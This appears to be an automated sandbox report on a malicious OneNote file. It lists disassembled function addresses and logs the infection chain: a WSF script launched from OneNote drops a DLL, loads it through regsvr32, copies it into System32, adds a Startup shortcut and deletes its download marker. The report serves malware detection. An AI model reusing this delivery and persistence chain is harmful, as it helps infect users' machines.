                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02061C6015_2_02061C60
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02064C6C15_2_02064C6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206BC6C15_2_0206BC6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207866C15_2_0207866C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207767415_2_02077674
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208188815_2_02081888
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208308C15_2_0208308C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206148015_2_02061480
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207E68015_2_0207E680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208068015_2_02080680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02086C8415_2_02086C84
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206E88815_2_0206E888
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206949015_2_02069490
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206CC9015_2_0206CC90
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207C09C15_2_0207C09C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207449815_2_02074498
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020880A815_2_020880A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020618A415_2_020618A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02088CA015_2_02088CA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020868A415_2_020868A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020754A815_2_020754A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020778A815_2_020778A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206A6C415_2_0206A6C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206A0C015_2_0206A0C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206EACC15_2_0206EACC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020730CC15_2_020730CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207ACCC15_2_0207ACCC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020814C415_2_020814C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020796C815_2_020796C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206D0D415_2_0206D0D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020736D415_2_020736D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207FCD015_2_0207FCD0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02074CD015_2_02074CD0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020738D815_2_020738D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020812E815_2_020812E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207EEE015_2_0207EEE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02065CF415_2_02065CF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020804F415_2_020804F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208510815_2_02085108
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207BB0015_2_0207BB00
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02087F0015_2_02087F00
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02088B0015_2_02088B00
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206430815_2_02064308
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207911C15_2_0207911C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207931815_2_02079318
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207D52415_2_0207D524
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208612C15_2_0208612C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206592015_2_02065920
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206932015_2_02069320
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206CB2C15_2_0206CB2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206CF3415_2_0206CF34
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207BD3015_2_0207BD30
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02071F3015_2_02071F30
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02082D3415_2_02082D34
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02078D3815_2_02078D38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02066F4415_2_02066F44
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207094415_2_02070944
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208234C15_2_0208234C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207FF4015_2_0207FF40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02071D4015_2_02071D40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206134C15_2_0206134C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02079D5015_2_02079D50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207CB5C15_2_0207CB5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02070F5C15_2_02070F5C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02064B5815_2_02064B58
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208836815_2_02088368
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206256415_2_02062564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02086F6C15_2_02086F6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02068D6C15_2_02068D6C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0208556415_2_02085564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206B37415_2_0206B374
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207897015_2_02078970
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207F37015_2_0207F370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206697C15_2_0206697C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206A37C15_2_0206A37C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206D97C15_2_0206D97C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02085B7415_2_02085B74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206F57815_2_0206F578
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207E18415_2_0207E184
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02076F8015_2_02076F80
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206838815_2_02068388
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207778815_2_02077788
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206119415_2_02061194
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02064D9415_2_02064D94
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206859015_2_02068590
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207479015_2_02074790
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207E99015_2_0207E990
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206B79C15_2_0206B79C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206919815_2_02069198
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020831AC15_2_020831AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206A5A015_2_0206A5A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020615AC15_2_020615AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020873A415_2_020873A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02083BB815_2_02083BB8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02061FB015_2_02061FB0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020825B015_2_020825B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020717C415_2_020717C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02063BC015_2_02063BC0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020663C015_2_020663C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020715C015_2_020715C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020719CC15_2_020719CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02082BD815_2_02082BD8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206CDD015_2_0206CDD0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020787D015_2_020787D0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206C3DC15_2_0206C3DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020649D815_2_020649D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020763E415_2_020763E4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_020853EC15_2_020853EC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_02073DE015_2_02073DE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207B9E815_2_0207B9E8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0207AFF815_2_0207AFF8
                  Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000000018002CDF4 appears 36 times
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180048CF0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,RtlQueueApcWow64Thread,NtTestAlert,ExitProcess,14_2_0000000180048CF0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180048DE0 LdrFindResource_U,LdrAccessResource,atoi,NtAllocateVirtualMemory,14_2_0000000180048DE0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0000000180048F20 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,14_2_0000000180048F20
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: malware.oneReversingLabs: Detection: 28%
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\malware.one
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll"
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JMgyzwrCUAZpIA\OfEg.dll"
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsrJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll"Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\JMgyzwrCUAZpIA\OfEg.dll"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
                  Source: Send to OneNote.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{1EAA3540-8CC4-4BDA-8352-7C887469FFAC}Jump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{139C41D2-9C6B-4FD2-B347-E0B7E41E4B18} - OProcSessId.datJump to behavior
                  Source: classification engineClassification label: mal100.troj.expl.evad.winONE@12/696@3/43
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026098C8 FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,14_2_026098C8
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEMutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
                  Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00C00F21 push eax; iretd 14_2_00C00F22
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0261066D push ebp; iretd 14_2_0261066E
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02623517 push eax; iretd 14_2_0262351B
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260E5FA push esi; iretd 14_2_0260E5FB
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_026235B5 push eax; retf 0000h14_2_026235B9
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260FAD7 push ebp; ret 14_2_0260FAD8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02623B1E push eax; ret 14_2_02623B1F
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02615F5A push ebp; iretd 14_2_02615F5B
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260FFFE push ebp; retf 14_2_0260FFFF
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_0260FD5D push C128DDF7h; ret 14_2_0260FD62
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02607DA1 push ecx; retf 14_2_02607DA8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_00840F21 push eax; iretd 15_2_00840F22
                  Source: C:\Windows\System32\regsvr32.exeCode function: 15_2_0206E5FA push esi; iretd 15_2_0206E5FB
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dll
                  Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\rad66B18.tmp.dllJump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\JMgyzwrCUAZpIA\OfEg.dll (copy)Jump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\JMgyzwrCUAZpIA\OfEg.dll (copy)Jump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\JMgyzwrCUAZpIA\OfEg.dll:Zone.Identifier read attributes | deleteJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exe TID: 2388Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\regsvr32.exe TID: 1952Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.0 %
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002ED44 memset,FindFirstFileExA,14_2_000000018002ED44
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002F114 memset,FindFirstFileExW,FindClose,FindNextFileW,14_2_000000018002F114
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002F2C4 FindFirstFileExA,14_2_000000018002F2C4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_000000018002F2F0 FindFirstFileExW,14_2_000000018002F2F0
                  Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: wscript.exe, 0000000A.00000003.365300906.00000000067D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.363410044.0000000005A73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365708406.00000000067DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391640204.0000000006904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365546187.00000000067D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365393503.0000000006867000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365227368.0000000006860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365163750.00000000067D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365478196.00000000068FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.365631758.0000000006867000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: MTGestures.dllAFxNCNDhpJUjLGSUBdyJAlirWAPgLpQbnGOFgAaVQghYMoDvlcIkoDhwOzmAbGiqsZapYXQEJBQNrWjAcIMOdUMWKfNaHjlQaJhaKDTvvAjmdNJiPaRsRtAqadcjQnlCAvvAmhroJJBvgsvkBdxxRGsBgAFcJiBlIVCeEMUhTYUniUkHlJscBBleGyOkIaepldUiBoepXZDDjhOrSbcuQncJBBpzeaEnGaBwCjRpCFIstcxCJsqCnAMpjCNPpdSVcuSzviIZhvCWSTfhZCOOXnQoQSaTGSpWIAaSzoCSUruSgGDFRVUvVHcTuCTCQAClHYzuiPWfwqyQYVCeHgsCxOuoDTDrPCpbkGyHjPVYKKbevwuabtfosDIczDdVVlDDXtcAMkZFBDahoeOjCyDdmfNyLzGBEZdhjuVaLnGLACDllRegisterServerEDirxlezljynQMbEJrkYuGqWKJxcbkEWFxWujEOCBExEDvmpuiTSdISaFTJpbnDERdHSxbrluXBmlgEWqRXzEYZJPwDvIiOCEbquiojgkxAHEjCrzKFSJZHjqXtVCcouBFmgnZSsFwGMzFvmlRhqfdgYjGEakZdngEgkQEMUwGIucseXHMrRrXPFeKwGNoduqRICMxxYLScjzRRGTdkEFQtZIyifVPtMwGUUIOYFVBkCRKKGPMGabGyYGlmIPNFEUxGfzccoGbGvtGqxGeRkjCFWGrnXAGGsRUyGCvRhXYbBNdoXgMoDGyQSbTrVGUQXgOfZOvlwGGJOZHCaLEQxCPhokiggZcHETlXzHRQNzHLCNHYjXYHbOXELXYCISKZiApGwwqfPxyvDEIcSKMpKalYoTBtNCIprhqRmUjfLjdAvaVSyhIsZFDjJYWWGraQqQsCIojuoPIItCdjvWTgdRQjqKEojXISZBJEVIhwFBZItxqXVhyUDXDtvWJEhcfsFJLIJhsVgkWwuNGjkVJBvJiXLWADKJkvQVFXLkJqTVuEmdOvJuvMSMMEvEFKDwYBJCicCZzRoOZKLAfQsdsaKGHSrQOYTMpVzgKKSnZqpvzTNlKWfbJvRFrOVKcugiBMUcgjkCqcKidKIFrYdPHAreKlkHRlyspyEbCqaAFKtJgAGRGyADIhGcLGWXmeQgMABuLGyzhOBlGMKKEiSyBNOALUjVXvmpjLkwIEYtcKcCxLebFCnlzbXtrrLdBLsyMBhredZBvkLtFyFAsWliacGsTGXqjeeLvKMBYEluvEyDzsCMHJytDnaUPMzuebMRAAdjwmnMsgXIeyxsstimLMTyYvXrFDEVJRoIKFwFlMXvGmOYJBUNcUhrUCfuEpjMZrxiTTzjWhcxLrlJkMdAKHWoLiTGZEMoEtlGhIUoAqzlzsWDDMxxORRnmNDUAXvzsdeydywwRNMHWRJGKNTSxfMIpNzhwDaIYTgNUIiQUpkBNdojhsEWJXelkYgYNqNktJurxEPsSVvLgoiCKIOBviaeAmDhEKBOPTztDwnXmUalzOarYXdaVMsOuaaSMDdKAHJBSIOxtFZQuvLvXOPJPUWySrtcFnoUPkrxWwdQBzgDamuPMHnmBmxqsemBQIPgSlrJQdXiEwjVRvwsAQkJCVvrpOQlKOChPtGkCgueNfMfmERgpZIjoSRyWPRDWAZokSpgjdXRzInNvLFbXSrZsSBVACGqdLSEXaxJESRIMcYcgmQzvSVExPilkWeEdOmPKxmESshJfgldnoPmDiuzthDwdSvDHpIXgTHleRyMKuvcwAptfFoQKTTMslvZRPDHsOsrUTYDISaLzbhUCcbUfpvnUSnHmXWDgJkTuRXnXRjnUUHotoQypbMRPBbQhwXJUViPeuVtuJLKcVBkQTrbKGhVfQhRTgXMjbrfiaAVFhGvlPGsQhxHtTvhSxKcYVMzeZLRonjcndVvcxTjnHmbhTuwSuWNjGlSlYPJjasDjMnceJuoqnOlWOmHhVXUWWcFKCSWghExnDSDsHbsIsQUpcOxNqWxdatBbzivhjgPXiraHxWOMXAcTVarCmGzFXAqsrMHoZFRaFCiaysvzyXIXyiQCQXQVwoczNAXAPbeZcjruIAXatHkgeISNpXpoUhKqoThknYDFhjgerDlMLHVuXkSGEvYDKNGzOAPZlebFJpomRMxWNWgYFhZJoLhPOxEKBaBTzdVAsYMAJlulpbXVSpmjWQoONYiYQhjFQTZKDCYVgAZYazoRsKAdHqUTqkgZqYkervHFfkUmQZlZscmMrWiZmdBIuhvLHIhsHYfrVvyNMOdaWbGhfFeswwmRPshquqslaloTparayLOamdrEpsUbQQBvUQwwbVWsKcmDpbKTsnGSXiKxMbeHDhlBgUZsmJPexvSQKWCSKnWbrphqpZlLTLruTZptcbwgKjSDuHKhDycEmuUSbtGzsPAWGLdEauFUcZCtvLKOxGXeuQWSccdfvrWFVeOtkqurRNVLroceebsfNkbprRYccjGWSRcnuLgsUOwrPiwdKIpmirTdWSStgetesFZgKWUlQPKUdnXDSBiTBWydoAVSHUlJOFKbCQnzEWdsZUCLcbYUzqmmDeGrZsXvfFODoRkFUnPhPoFzbafuifZITkvmvMdUvysqfnQaoYOUVIfobQqObMbQikgyImDguWIsSqjWfvnKblUjOPABvhygHaJYcXzizzOUSXyHhzXijgVVLvYgYsqbdDRcVuEYqgkKTzQjnWeBVBmdNPhYVSsGvvkQKPjqcuHGhHnYbAhdCnmtITRRiwGbqpRVNVjhgmXlQGHxqVCPqrOlJgdTzKjmyhmUYZEkqsDhnPgQMKxfZHjhrxRKGrcsUQAxyvDxBdrVDpeiVhyuMolihzuYAENAOWXcCMPPwupdATiDKwhDiLpIoCoOGqSLknWShpOrXAuKwiYwAhnXpbSUzlmHnmKQLjmmXKidYAJoIIJgaqEeHFdgifPZCTSHPzCTdOekgUaxrQHYucixhaskjGAZP
                  Source: wscript.exe, 0000000A.00000003.393578356.0000000005A12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.375930591.0000000005A12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394983782.0000000005A12000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.572181479.000000000072D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.572181479.000000000077A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
